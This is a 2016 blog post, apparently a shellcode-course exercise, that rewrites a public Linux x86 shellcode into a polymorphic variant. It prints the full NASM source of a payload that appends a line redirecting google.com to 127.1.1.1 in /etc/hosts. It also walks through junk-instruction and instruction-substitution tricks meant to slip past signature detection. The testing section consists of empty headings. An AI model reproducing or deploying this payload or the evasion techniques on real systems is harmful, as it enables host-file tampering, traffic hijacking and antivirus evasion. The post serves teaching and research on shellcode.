AdSense

Friday, March 11, 2016

6_2 - Polymorphism: adding entries to "/etc/hosts" file


6_2 -  ADDING ENTRIES TO "/ETC/HOSTS" FILE

1 - INTRODUCTION

- Same concepts studied at  6_1 apply in this case.

2 - MODIFYING A SHELLCODE

- The original program to be modified in this practice has the effect of adding a new entry in hosts file pointing 127.1.1.1 to google.com:

http://shell-storm.org/shellcode/files/shellcode-893.php

- Let's see 3 possible modifications:

a) Based in the fact that any number AND-ed by itself is the same number, the junk instruction "and edx,edx" is introduced, which effect on the functionality of the program is null:

https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29

b) Instead of pushing "/etc///hosts" characters directly onto the stack, they are moved in chunks of 4 to the stack:

    mov dword [esp-4],0x7374736f ; instead of pushing
    mov dword [esp-8],0x682f2f2f ; /etc///hosts
    mov dword [esp-12],0x6374652f ; is moved into esp
    sub esp,0xc

c) Finally, instead of using the stack to load identifiers of syscalls, "mov" instruction is used. This method is used for write(20), close(6) and exit(1):

    ;push 20         
    ;pop edx
    mov dl,0x14    ; identifier (20) for write syscall is moved to dl
    int 0x80        

   ;push 0x6
    ;pop eax
    mov al,0x6      ; identifier (6) for close syscall is moved to al
    int 0x80       

    ;push 0x1
    ;pop eax
    mov al,0x1
    int 0x80       ; identifier (1) for exit syscall is moved to al   

- The resulting assembly program of applying these modifications is A6_2.nasm:

global _start
section .text

_start:
    and edx,edx     ; junk instruction with no effect
    xor ecx, ecx
    mul ecx
    mov al, 0x5     
    push ecx

    ;push 0x7374736f     ;/etc///hosts
    ;push 0x682f2f2f
    ;push 0x6374652f
    
    mov dword [esp-4],0x7374736f ; instead of pushing
    mov dword [esp-8],0x682f2f2f ; /etc///hosts
    mov dword [esp-12],0x6374652f ; is moved into esp
    sub esp,0xc

    mov ebx, esp
    mov cx, 0x401      
    int 0x80        

    xchg eax, ebx
    push 0x4
    pop eax
    jmp short _load_data    

_write:
    pop ecx
    ;push 20         
    ;pop edx
    mov dl,0x14    ; identifier (20) for write syscall is moved to dl
    int 0x80        

    ;push 0x6
    ;pop eax
    mov al,0x6      ; identifier (6) for close syscall is moved to al
    int 0x80       

    ;push 0x1
    ;pop eax
    mov al,0x1
    int 0x80       ; identifier (1) for exit syscall is moved to al   

_load_data:
    call _write
    google db "127.1.1.1 google.com"


3 - TESTING POLYMORPHISM

- Assembling and linking A6_2.nasm:




- Extracting the shellcode:




- Applying to ShellcodeTest.c program:

 



- Compiling ShellcodeTest.c:




- Executing ShellcodeTest.c: 




- The result is the same as the original program, a new entry is created into "/etc/hosts" file, pointing 127.1.1.1 to google.com:




- While the original shellcode had 77 Bytes, the new one has got 88 Bytes. It means an increment of 14%.